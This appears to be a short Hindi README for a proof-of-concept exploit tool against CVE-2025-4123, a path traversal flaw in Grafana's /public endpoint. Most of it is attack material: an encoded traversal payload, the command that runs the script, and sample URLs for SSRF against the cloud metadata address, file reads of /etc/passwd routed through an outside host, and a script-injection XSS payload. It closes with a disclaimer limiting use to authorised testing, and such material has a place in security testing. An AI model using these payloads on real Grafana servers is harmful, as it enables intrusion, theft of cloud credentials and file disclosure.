
CVE-2025-4123 - Grafana टूल
mitsec द्वारा विकसित
यह CVE-2025-4123 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण उपकरण है, जो Grafana के /public एंडपॉइंट में एक गंभीर पथ भ्रमण कमजोरी है। यह शोषण निम्नलिखित की अनुमति देता है:
Grafana ऐसे उदाहरण जिनका /public/ एंडपॉइंट एन्कोडेड पथों को अनुचित रूप से संभालता है, जैसे:
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
python3 cve_2025_4123_exploit_mitsec_final.py
फिर वांछित मोड चुनें:
169.254.169.254/etc/passwd[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL: http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL: http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
यह कोड केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। बिना सहमति के सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है।